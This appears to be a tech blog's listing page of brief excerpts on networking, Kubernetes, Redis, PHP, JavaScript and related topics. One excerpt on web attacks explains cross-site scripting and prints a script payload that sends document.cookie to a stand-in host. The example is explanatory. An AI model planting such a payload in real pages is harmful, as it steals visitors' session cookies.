Open vSwitch

Open vSwitch is an open source implementation of virtual switches. Widely used in the cloud computing industry to provide network administrators with visibility and control of traffic between and within virtual cloud hosts, Open vSwitch is designed to solve network problems with a virtualization solution that works with controller software to enable distributed virtual switching technology. This means that the switch and controller software can create clustered network configurations across

Kubernetes Best Practices Guide for Security

For most Kubernetes users, security is either irrelevant or not that important, and even when it is considered, it is only perfunctory. In fact, Kubernetes offers a wide range of options that can greatly improve the security of your application, and if you use them well, you can keep most attacks at bay. To make it easier to get started, I’ve summarized them into a few best practice configurations that you can use once you’ve read them.

Father of GNU Project: Apple turns Mac into a "prison" | Ubuntu is not free GNU/Linux distributions are not recommended

On April 13, Richard Stallman, the father of the GNU project and founder of the Free Software Foundation (FSF), spoke about the current state of open source software in the industry during his keynote address, “The State of the Free Software Movement.” He also focused on “bashing” Apple and Ubuntu. Stallman says that Apple is continuing to turn the Mac into a “prison” – preventing users from doing what they want on their devices, such as installing their own programs or getting binaries from others.

Node version manager: nvm and n difference

Among the version management tools for node, nvm is naturally well known, but we cannot forget n from TJ. These two are the most mainstream solutions at the moment. For more information on how to install and use these two tools, please see their respective homepages: creationix/nvm, TJ. Next we focus on the operation and characteristics of nvm and n. n: n depends on node. n is an npm package that needs to be installed globally.

Common Web Attack Means

1. Cross-site scripting attacks. Concept: Cross-Site Scripting (XSS) can inject code into the web pages that users browse; such code includes HTML and JavaScript. Principle of the attack: For example, there is a forum site on which an attacker could post the following: <script>location.href="//domain.com/?c=" + document.cookie</script> The content may then be rendered in the following form: <p><script>location.href="//domain.com/?c=" + document.cookie</script></p> Another user viewing a page with this content will be redirected to domain.

MVCC in Mysql

What exactly is MVCC? Definition: Multi-Version Concurrency Control, literally, the use of multiple versions for reasonable control during concurrency (that’s how I took it literally anyway). Obviously this thing is an abstract concept, and it is. It is mainly found in some data management software. Maintaining multiple versions of data makes the read and write operations conflict-free. Why is this thing there? We all know that the data

W3C released the first draft of WebAssembly 2.0

The W3C today published the first Public Working Drafts (PWDs) of WebAssembly 2.0, consisting of 3 parts. WebAssembly Core Specification - Version 2.0: describes version 2.0 of the WebAssembly core standard, a secure, portable underlying code format designed to execute efficiently and provide a compact representation. WebAssembly JavaScript Interface - Version 2.0: provides an explicit JavaScript API for interacting with WebAssembly. WebAssembly Web API - Version 2.

The difference between AOF and RDB persistence

AOF and RDB persistence process review. From the previous two articles we know some details of AOF and RDB persistence. In this article, let’s compare which persistence method is better for which environment. First we review the process of the two persistence methods. AOF Persistence Process: AOF persistence is similar to MySQL’s binlog, which records all modifying operations: all commands sent by the client are appended and saved in Redis command protocol format. To keep the file size reasonable, Redis also rewrites the AOF file in the background by creating a child process, so that the AOF file does not exceed the actual size required to save the dataset state. Note that when the server starts, Redis gives preference to the AOF file to restore data by executing these commands, because the AOF file saves a more complete dataset than RDB does, and the stored files are generally larger than RDB files.

Redis' RDB persistence principle

Redis provides two persistence mechanisms, RDB and AOF. This chapter first describes how the Redis server saves and loads RDB files, focusing on the implementation of the SAVE and BGSAVE commands. After that, the chapter continues with a description of how the Redis server’s auto-save feature is implemented. The components are described, and the structure and meaning of these components are explained. At the end of this chapter, we will

Redis' AOF persistence principle

Redis provides two separate persistence mechanisms, RDB and AOF. This chapter first describes how the AOF feature works, how commands are stored in AOF files, and how different AOF storage modes affect data security and Redis performance. After that, we will introduce the method of restoring the database state from the AOF file and the implementation mechanism behind the method. Some pseudo-code will also be used to facilitate understanding. This

Efficient IO Technology - Zero Copy

This technique is used for IO operations, which consume a lot of CPU performance. Why can IO operations easily become a performance bottleneck? Every IO operation involves a conversion between the kernel space and user space of the operating system, and the real IO operations are actually performed in the kernel space of the operating system. Whether it is file IO or network IO, in the end it can be unified as an exchange of user-space and kernel-space data.

Security vulnerability that can be triggered by dragging a file, affects all versions

7-Zip is an open source decompression software, mainly used on Microsoft Windows operating systems. 7-Zip’s authors released the first official version for Linux last March, allowing Linux users to use the official 7-Zip development to replace the ageing p7zip. Recently, researcher Kağan Çapar discovered a vulnerability in 7-Zip that could lead to hackers being granted elevated privileges and executing arbitrary commands. The CVE ID of the vulnerability is CVE-2022-29072 and it affects all versions of 7-Zip, including the current version 21.

PHP underlying operating mechanism and principle analysis

PHP is simple, but it’s not easy to master. In addition to knowing how to use it, we also need to know how it works under the hood. What is the purpose of understanding the underlying implementation of PHP? To use a dynamic language well, we must first understand it, the memory management and framework model is worth learning from, and we can optimize the performance of our programs by

Writing extensions to PHP 7.4

This article is based on PHP 7.4 and explains how to create a PHP extension from scratch. This article will explain the basic steps to create an extension. In the example, we will implement the following functionality: <?php echo hello(); Output content: // $ php74 ./hello.php $ hello word Implement a hello method in the extension to output hello word! after calling the hello method.

Software running mechanism and memory management

The core function of an operating system is software governance, and a very important part of software governance is to allow multiple software to work together to use the computer’s resources rationally and without contention. Memory, as the most basic hardware resource of a computer, has a very special position. We know that the CPU can directly access very few storage resources, only: registers, memory (RAM), ROM on the motherboard.

About Memory Alignment

Computer memory is divided in bytes, so in theory the CPU can access any number of bytes, but in practice this is not the case. For a CPU with a data bus width of 32 bits, the actual addressing step is 4 bytes, which means that only memory numbered in multiples of 4 is addressed, such as 0, 4, 8, 12, 1000, and so on, but not memory numbered 1,

How to improve the security of Docker containers

With the rise of Docker, more and more projects use Docker to build production environments, because containers are light enough to quickly start and migrate business services. In the process, however, it is easy to overlook security: although a container provides isolation, its architecture differs considerably from that of a virtual machine. A virtual machine adds a hypervisor layer that virtualizes the network card, memory, CPU and other hardware, and virtual machines are then built on top of it, each with its own system kernel.

Four ways to use Controller Runtime

As the cloud-native ecosystem continues to evolve, most of the current Kubernetes-based cloud-native technologies adopt the CRD + Controller model. Even without a custom CRD, there will be a need for a controller to detect resources of interest and do the work required by the business when their state changes. controller-runtime is a relatively good tool provided by the Kubernetes community to quickly build a set of watches for the ApiServer.

5 New JavaScript Features You Must Learn

JavaScript is constantly being upgraded and iterated, and there are more and more new features that make our code simple and interesting to write. This article introduces 5 new features; let’s study them together. 1. Use “Object.hasOwn” instead of the “in” operator. Sometimes we want to know if a property exists on an object. We usually use the “in” operator or “obj.hasOwnProperty”, but they both have their own drawbacks.

A PaaS system powered by Kubernetes - Porter

Porter is a Kubernetes-powered PaaS system that runs in your own cloud provider. Porter tries to bring the Heroku experience to your own AWS/GCP account while upgrading your infrastructure to Kubernetes. Overview: A traditional PaaS like Heroku is great for minimizing unnecessary DevOps efforts, but it doesn’t provide enough flexibility as applications grow. Custom network rules, resource constraints, and cost are common reasons for developers to move their applications away from Heroku.